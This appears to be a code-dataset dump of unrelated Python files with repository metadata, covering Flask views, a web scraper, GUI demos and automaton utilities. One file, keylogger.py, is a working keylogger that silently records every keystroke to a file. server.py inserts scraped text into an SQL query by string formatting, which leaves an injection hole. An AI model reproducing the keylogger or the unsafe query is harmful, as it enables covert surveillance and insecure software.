| 0.045627
| 0.026073
| 0.125747
| 0.104834
| 0.097773
| 0.097773
| 0.050516
| 0
| 0
| 0.019023
| 0.246189
| 6,625
| 219
| 149
| 30.251142
| 0.718062
| 0.042717
| 0
| 0.101124
| 0
| 0
| 0.159639
| 0.003445
| 0
| 0
| 0
| 0
| 0.005618
| 1
| 0.044944
| false
| 0.005618
| 0.02809
| 0.011236
| 0.11236
| 0.011236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c70133f7cd579129c6a6ff4af02a403f5a5c1b6
| 2,972
|
py
|
Python
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 16
|
2021-06-03T07:16:15.000Z
|
2022-03-24T13:07:31.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 6
|
2021-06-30T12:06:33.000Z
|
2022-02-10T04:49:10.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 4
|
2021-07-04T14:21:56.000Z
|
2021-08-23T19:55:06.000Z
|
### LATTICE OPERATIONS
from .data_structure_definitions import *


def trimTrapStates(doof):
    flag = 1
    while flag == 1:
        flag = 0
        statesToDelete = []
        dict_items = set([t[0][0] for t in doof.transitions.items()])
        for i, state in enumerate(doof.states):
            if state not in dict_items:
                # if len([0 for (k, v) in dict_items if k[0] == state]) == 0:
                if state != doof.engEnd and state != doof.mixEnd and state != doof.hinEnd and state not in doof.finalStates:
                    statesToDelete.append(state)
                    flag = 1
        for state in statesToDelete:
            doof.deleteState(state)


def mergeEquivalentStates(doof):
    flag = 1
    while flag == 1:
        flag = 0
        toMerge = []
        for state1 in doof.states:
            for state2 in doof.states:
                if state1 != state2:
                    transitions1 = [(k[1], v) for k, v in doof.transitions.items() if k[0] == state1]
                    transitions2 = [(k[1], v) for k, v in doof.transitions.items() if k[0] == state2]
                    if transitions1 != [] and transitions2 != [] and transitions1 == transitions2:
                        toMerge.append((state1, state2))
                        flag = 1
        for pair in toMerge:
            if pair[0] in doof.states and pair[1] in doof.states:
                # print 'deleting these:'
                # print pair[0], pair[1]
                doof.mergeStates(pair[0], [pair[1]])


def removeUselessStates(doof):
    statesToRemove = []
    for state in doof.states:
        transIn = {k: v for k, v in doof.transitions.items() if v == state}
        transOut = {k: v for k, v in doof.transitions.items() if k[0] == state}
        if state != 0 and len(transIn) == 0:
            statesToRemove.append(state)
        if len(transIn) == 1 and len(transOut) == 1:
            keys_in = list(transIn.keys())
            keys_out = list(transOut.keys())
            values_out = list(transOut.values())
            doof.addTransition(keys_in[0][0], keys_in[0][1][:-2] + " " + keys_out[0][1], values_out[0])
            del doof.transitions[keys_in[0]]
            del doof.transitions[keys_out[0]]
            statesToRemove.append(state)
    for state in statesToRemove:
        doof.deleteState(state)


def removeDollarTransitions(doof):
    dollarTransitions = {k: v for k, v in doof.transitions.items() if k[1] == "$_h" or k[1] == "$_e"}
    for k, v in dollarTransitions.items():
        transitionsToSink = {kk: vv for kk, vv in doof.transitions.items() if vv == v}
        if len(transitionsToSink) == 1:
            del doof.transitions[k]
            doof.mergeStates(k[0], [v])
        else:
            print("null transition between " + str(k[0]) + " and " + str(v) + " could not be removed")


def removeUnreachableStates(doof):
    flag = 1
    while flag == 1:
        flag = 0
        statesToDelete = []
        for state in doof.states:
            if len({k: v for k, v in doof.transitions.items() if v == state}) == 0:
                if state != doof.initialStates[0]:
                    statesToDelete.append(state)
                    flag = 1
        for state in statesToDelete:
            doof.deleteState(state)
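# Sketch of intent (doof is a lattice/automaton object coming from
# data_structure_definitions, so its exact API is assumed here):
# trimTrapStates repeatedly deletes states with no outgoing transitions
# (other than the end/final states), since a path that enters such a state
# can never reach an accepting state; removeUnreachableStates is the dual,
# deleting non-initial states with no incoming transitions.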
| 33.393258
| 116
| 0.605316
| 409
| 2,972
| 4.359413
| 0.190709
| 0.050477
| 0.076276
| 0.09871
| 0.340998
| 0.255188
| 0.255188
| 0.255188
| 0.241727
| 0.199103
| 0
| 0.028662
| 0.260431
| 2,972
| 89
| 117
| 33.393258
| 0.78253
| 0.042059
| 0
| 0.367647
| 0
| 0
| 0.018649
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073529
| false
| 0
| 0.014706
| 0
| 0.088235
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c749728947c088616bb2bf3b46fdb1485731043
| 5,021
|
py
|
Python
|
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Define routes for CRUD operations on users."""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from application.models import (Base,
Gift,
Claim,
User)
from flask import (request,
redirect,
url_for,
render_template,
flash,
session,
Blueprint)
# For making decorators
from functools import wraps
# Bind database
engine = create_engine('sqlite:///giftr.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
c = DBSession()
users_blueprint = Blueprint('users', __name__, template_folder='templates')
# DECORATORS
def login_required(f):
"""Redirect to login page if the user is not logged in (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'username' not in session:
flash('You need to be logged in to see that page.')
return redirect(url_for('login.show'))
return f(*args, **kwargs)
return decorated_function
def include_user(f):
"""Take a u_id kwarg and return a user object (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
user = c.query(User).filter_by(id=u_id).one_or_none()
if not user:
flash('There\'s no user here.')
return redirect(url_for('gifts.get'))
# pass along the gift object to the next function
kwargs['user'] = user
return f(*args, **kwargs)
return decorated_function
def user_required(f):
"""Take a user id (u_id) and redirect to home if logged in user doesn't match that id (decorator).""" # noqa
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
if u_id != session.get('user_id'):
flash('You can only do this for your own profile.')
return redirect(url_for('gifts.get'))
return f(*args, **kwargs)
return decorated_function
# ROUTES
@users_blueprint.route('/users/<int:u_id>/profile', methods=['GET'])
@login_required
@include_user
def get_byid(u_id, user):
"""Render a user with id u_id's profile.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
return render_template('user.html',
user=user)
@users_blueprint.route('/users/<int:u_id>/edit', methods=['GET'])
@login_required
def edit_get(u_id):
"""Render an edit form for the logged in user.
Login required.
Argument:
u_id (int): the id of the desired user.
"""
return render_template('edit_user.html')
@users_blueprint.route('/users/<int:u_id>/edit', methods=['POST'])
@login_required
@user_required
@include_user
def edit_post(u_id, user):
"""Edit a user of id u_id with POST.
Login required.
One has to be logged in as the requested user to access this.
Arguments:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
user.name = request.form.get('name')
user.picture = request.form.get('picture')
user.email = request.form.get('email')
user.address = request.form.get('address')
c.add(user)
c.commit()
session['username'] = user.name
session['picture'] = user.picture
session['email'] = user.email
session['address'] = user.address
flash("Your account was successfully edited.")
return redirect(url_for('users.get_byid',
u_id=user.id))
@users_blueprint.route('/users/<int:u_id>/delete', methods=['GET'])
@login_required
def delete_get(u_id):
"""Render a delete form for the logged in user.
Login required.
Arguments:
u_id (int): the id of the desired user.
"""
return render_template('delete_user.html')
@users_blueprint.route('/users/<int:u_id>/delete', methods=['POST'])
@login_required
@include_user
@user_required
def delete_post(u_id, user):
"""Delete a user of id u_id with POST.
Login required.
    One has to be logged in as the requested user to access this.
    Arguments:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
# Delete the gifts of that user too
user_gifts = c.query(Gift).filter_by(creator_id=user.id).all()
for gift in user_gifts:
# Delete the claims to that gift first
claims = c.query(Claim).filter_by(gift_id=gift.id).all()
for claim in claims:
c.delete(claim)
c.delete(gift)
c.delete(user)
c.commit()
flash("Your account was successfully deleted.")
return redirect(url_for('logout.disconnect'))
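A minimal sketch of how this blueprint would plausibly be mounted in a Flask app; the app factory and secret key here are assumptions, and the import path simply mirrors the file's location in the repository. The other blueprints referenced via url_for (gifts, login, logout) would be registered the same way.

from flask import Flask
from application.views.client.users.views import users_blueprint

app = Flask(__name__)
app.secret_key = 'change-me'  # session and flash() require a secret key
app.register_blueprint(users_blueprint)

if __name__ == '__main__':
    app.run(debug=True)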
| 28.050279
| 113
| 0.632344
| 695
| 5,021
| 4.434532
| 0.21295
| 0.029202
| 0.012979
| 0.032446
| 0.418559
| 0.377028
| 0.358858
| 0.336145
| 0.268008
| 0.208306
| 0
| 0
| 0.253137
| 5,021
| 178
| 114
| 28.207865
| 0.821867
| 0.289584
| 0
| 0.297872
| 0
| 0
| 0.148824
| 0.034412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117021
| false
| 0
| 0.053191
| 0
| 0.319149
| 0.074468
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c7515d17c45501d0f2599188199dfb75f86e5a6
| 2,077
|
py
|
Python
|
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
from flask import Flask
import requests
from bs4 import BeautifulSoup
import os
import sqlite3
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
URL = os.environ.get('SOURCE_URL')
AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
app = Flask(__name__)
def send_simple_message(title, message):
return requests.post(
os.environ['MAIL_URL'],
auth=("api", os.environ['MAILGUN_API_KEY']),
data={"from": "Embevent App <mailgun@sandboxfb0448ff1cfb4ffba160daeecce04274.mailgun.org>",
"to": os.environ['MAIL_LIST'].split(";"),
"subject": title,
"text": message})
def processUpdates(cards):
connection = sqlite3.connect("database.db")
cursor = connection.execute("Select * from CARDS")
old_cards = len(cursor.fetchall())
if len(cards) > old_cards:
logging.info("New updates. Processing")
card = cards[0]
title = card.find_all('h2', class_='h3')[0].text
date = card.find_all('h3', class_='h5')[0].text
content = card.find_all(["p", "div"])[0]
command2 = "INSERT INTO CARDS (title, date, content) VALUES ('{0}', '{1}', '{2}')".format(title,date,content)
connection.execute(command2)
connection.commit()
connection.close()
logging.info("Update stored in DB")
send_simple_message(title=title, message=card)
logging.info("Mail sent")
return card.text
else:
logging.info("No updates generated")
f = cards[0]
the_date, = f.find_all('h3', class_='h5')
return "No news. Last update: {0}. articles available: {1}".format(the_date.text, old_cards)
@app.route('/')
def news():
if not URL:
return "No URL added"
response = requests.get(URL, headers={'User-Agent': AGENT })
soup = BeautifulSoup(response.content, 'html.parser')
cards = soup.find_all('div', class_='card')
return processUpdates(cards)
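processUpdates() assumes database.db already contains a CARDS table. The schema is not part of this file, so the bootstrap below is an assumption inferred from the INSERT statement above:

import sqlite3

def init_db(path="database.db"):
    # Hypothetical schema matching the columns used in processUpdates().
    connection = sqlite3.connect(path)
    connection.execute(
        "CREATE TABLE IF NOT EXISTS CARDS ("
        "id INTEGER PRIMARY KEY AUTOINCREMENT, "
        "title TEXT, date TEXT, content TEXT)"
    )
    connection.commit()
    connection.close()

init_db()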
| 32.968254
| 131
| 0.632162
| 262
| 2,077
| 4.900763
| 0.465649
| 0.027259
| 0.025701
| 0.034268
| 0.024922
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038272
| 0.220029
| 2,077
| 63
| 132
| 32.968254
| 0.754321
| 0
| 0
| 0
| 0
| 0.020408
| 0.263234
| 0.029355
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.122449
| 0.020408
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c7727ecdb99959039e2a39114163de2e8432514
| 1,549
|
py
|
Python
|
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
"""
Implementation of a ButtonEditor demo plugin for Traits UI demo program.
This demo shows each of the two styles of the ButtonEditor.
(As of this writing, they are identical.)
"""
from traits.api import HasTraits, Button
from traitsui.api import Item, View, Group
from traitsui.message import message
#-------------------------------------------------------------------------
# Demo Class
#-------------------------------------------------------------------------
class ButtonEditorDemo(HasTraits):
""" This class specifies the details of the ButtonEditor demo.
"""
# To demonstrate any given Trait editor, an appropriate Trait is required.
fire_event = Button('Click Me')
    def _fire_event_fired(self):
message("Button clicked!")
# ButtonEditor display
# (Note that Text and ReadOnly versions are not applicable)
event_group = Group(Item('fire_event', style='simple', label='Simple'),
Item('_'),
Item('fire_event', style='custom', label='Custom'),
Item('_'),
Item(label='[text style unavailable]'),
Item('_'),
Item(label='[read only style unavailable]'))
# Demo view
view1 = View(event_group,
title='ButtonEditor',
buttons=['OK'],
width=250)
# Create the demo:
popup = ButtonEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
popup.configure_traits()
| 30.98
| 78
| 0.551323
| 158
| 1,549
| 5.278481
| 0.531646
| 0.043165
| 0.040767
| 0.043165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0035
| 0.262105
| 1,549
| 49
| 79
| 31.612245
| 0.726159
| 0.404132
| 0
| 0.142857
| 0
| 0
| 0.160932
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.142857
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c77652672bdfce35cef51c965f7b9c88501f504
| 1,181
|
py
|
Python
|
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import setuptools
version='0.1'
setuptools.setup(
name='TracDevPlatformPlugin',
version=version,
description='Provide helpers to ease development on top of Trac',
author='Felix Schwarz',
author_email='felix.schwarz@oss.schwarz.eu',
url='http://www.schwarz.eu/opensource/projects/trac_dev_platform',
download_url='http://www.schwarz.eu/opensource/projects/trac_dev_platform/download/%s' % version,
license='MIT',
install_requires=['Trac >= 0.11'],
extras_require={'BeautifulSoup': 'BeautifulSoup'},
tests_require=['nose'],
test_suite = 'nose.collector',
zip_safe=False,
packages=setuptools.find_packages(exclude=['tests']),
include_package_data=True,
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Trac',
],
)
| 31.078947
| 101
| 0.653683
| 125
| 1,181
| 6.064
| 0.672
| 0.03562
| 0.026385
| 0.044855
| 0.158311
| 0.158311
| 0.158311
| 0.158311
| 0.158311
| 0.158311
| 0
| 0.007439
| 0.203218
| 1,181
| 37
| 102
| 31.918919
| 0.798087
| 0.035563
| 0
| 0
| 0
| 0
| 0.520246
| 0.043134
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c78adc10fdbecc0bce8f85ff740740007a63985
| 276
|
py
|
Python
|
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
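As written, the listener runs until the process is killed. pynput stops a listener when its callback returns False, so a variant that exits cleanly on Esc could look like this (a sketch, not part of the original file):

from pynput.keyboard import Key, Listener
import logging

logging.basicConfig(filename="keylog.txt", level=logging.DEBUG,
                    format="%(asctime)s - %(message)s")

def on_press(key):
    logging.info(str(key))
    if key == Key.esc:
        return False  # returning False stops the Listener

with Listener(on_press=on_press) as listener:
    listener.join()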
| 23
| 102
| 0.735507
| 39
| 276
| 5.128205
| 0.641026
| 0.105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119565
| 276
| 12
| 103
| 23
| 0.823045
| 0
| 0
| 0
| 0
| 0
| 0.129964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.285714
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c7b515ae39c770bf0370e05e2c3d7ec44f6e7fd
| 2,687
|
py
|
Python
|
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import datetime
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import functools
# import pathlib
from conflista import Bot
from salvacode import Salvar
from escreve import escreve
from geraqrcode import Gerar
date = datetime.date.today()
jan = Tk()
jan.title("Bot Mercado Envios")
jan.geometry("800x300")
jan.configure(background="#2b2b2b")
jan.resizable(width=False, height=False)
jan.iconbitmap(default=r"C:\programas\Programação\GitHub\Bot-ML\Bot-ML\images\LogoIcon.ico")
logo = PhotoImage(file=r"C:\programas\Programação\GitHub\Bot-ML\Bot-ML\images\logo.png")
messagebox.showinfo("Hello World !", "Seja Bem-Vindo ")
LeftFrame = Frame(jan, width=220, height=500, bg="#FF8C00", relief="raise")
LeftFrame.pack(side=LEFT)
RightFrame = Frame(jan, width=575, height=500, bg="#4f4f4f", relief="raise")
RightFrame.pack(side=RIGHT)
Caixas = Label(RightFrame, text="Total De Caixas:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Caixas.place(x=5, y=10)
CaixasEntry = ttk.Entry(RightFrame, width=53)
CaixasEntry.place(x=230, y=25)
Lote = Label(RightFrame, text="Nº Do Lote:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Lote.place(x=5, y=75)
LoteEntry = ttk.Entry(RightFrame, width=53)
LoteEntry.place(x=230, y=90)
Valores = Label(RightFrame, text="Codigos Lidos: ", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Valores.place(x=5, y=140)
ValoresEntry = Text(RightFrame, width=40, height=5)
# ValoresEntry.config(state=state)
ValoresEntry.place(x=230, y=155)
# file = open(f'C:\programas\Programação\GitHub\{date} QR-BarCode-Unity.txt', 'w+')
# file = open(f'{date} QR-BarCode-Unity', 'w+')
def PegaLista():
try:
Caixas = CaixasEntry.get()
Valores = ValoresEntry.get('1.0', END)
QuantCaixas = int(Caixas)
Lista = Valores
# Lista = Lista.replace(',+',',')
Lista = Lista.split(',+')
QuantLista = len(Lista)
if QuantCaixas == QuantLista:
try:
escreve(Bot, Lista, date, Salvar)
Gerar(Lista, LoteEntry, contador=0)
except:
messagebox.showerror("Erro !", "Falha Na Funรงรฃo (escreve)")
else:
messagebox.showerror("Erro !", "Seu Total de Caixas Nรฃo Bate Com Seus Codigos !")
except:
messagebox.showerror("Erro !", "Por Favor Coloque Os Valores Nos Campos !")
ConfButton = ttk.Button(RightFrame, text="Adicionar Lista", width= 30, command=PegaLista)
ConfButton.place(x=5, y=190)
jan.mainloop()
| 26.60396
| 106
| 0.671381
| 352
| 2,687
| 5.125
| 0.443182
| 0.023282
| 0.015521
| 0.017738
| 0.131929
| 0.104213
| 0.104213
| 0.104213
| 0.047672
| 0
| 0
| 0.03813
| 0.180127
| 2,687
| 101
| 107
| 26.60396
| 0.780754
| 0.077038
| 0
| 0.067797
| 0
| 0.033898
| 0.194343
| 0.050909
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.220339
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c80ebcea041e63107d9067c90a11c330c458c26
| 503
|
py
|
Python
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | 1
|
2018-07-19T10:34:46.000Z
|
2018-07-19T10:34:46.000Z
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
def binary(n):
if n not in binary.memoize:
binary.memoize[n] = binary(n//2) + str(n % 2)
return binary.memoize[n]
binary.memoize = {0: '0', 1: '1'}
def get_binary_l(n, l):
bin_str = binary(n)
return (l - len(bin_str))*'0' + bin_str
n_f = 9
with open('command_lines.txt', 'w') as out:
for i in range(2**n_f):
out.write('/home/nversbra/anaconda3/envs/py36/bin/python random_forest.py dida_posey_to_predict.csv 100 50 1-1-1 %s\n' % get_binary_l(i, n_f))
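A quick sanity check of the helpers above: get_binary_l(n, l) is n in binary, left-padded with zeros to width l, which is what lets the 2**n_f loop enumerate every on/off mask over the nine features.

assert binary(5) == '101'
assert get_binary_l(5, 9) == '000000101'
assert get_binary_l(0, 9) == '000000000'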
| 33.533333
| 151
| 0.61829
| 94
| 503
| 3.148936
| 0.5
| 0.175676
| 0.094595
| 0.135135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050633
| 0.214712
| 503
| 14
| 152
| 35.928571
| 0.698734
| 0
| 0
| 0
| 0
| 0.083333
| 0.259714
| 0.143149
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c81582355ba3220bcb59a6354b57fa7be7a46e7
| 17,422
|
py
|
Python
|
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
"""
Functions for plotting the signal-to-noise per angular bin.
"""
import math
import os.path
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import angular_binning.like_cf_gauss as like_cf
DEG_TO_RAD = math.pi / 180.0
def plot_cl_cf(diag_she_cl_path, she_nl_path, lmin, lmax, theta_min, theta_max, n_theta_bin, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_dir=None):
"""
Produce plots of signal-to-noise per element for both the unbinned power spectrum and the binned correlation
function, using data produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
she_nl_path (str): Path to shear noise power spectrum as a text file.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_theta_bin (int): Number of theta bins.
survey_area_sqdeg (float): Survey area in square degrees, used to calculate the noise variance for the
correlation function.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin, used to calculate
the noise variance for the correlation function.
sigma_e (float): Intrinsic ellipticity dispersion per component, used to calculate the noise variance for the
correlation function.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_dir (str, optional): Directory to save the two plots into, if supplied. If not supplied, plots are
displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Add noise
n_ell = lmax - lmin + 1
nl = np.loadtxt(she_nl_path, max_rows=n_ell)
cls_ = cls_nonoise + nl
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
assert cls_.shape == (n_samp, n_ell)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
fid_cl = cls_[fid_idx, :]
ell = np.arange(lmin, lmax + 1)
fid_cl_err = np.sqrt(2 * fid_cl ** 2 / (2 * ell + 1))
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
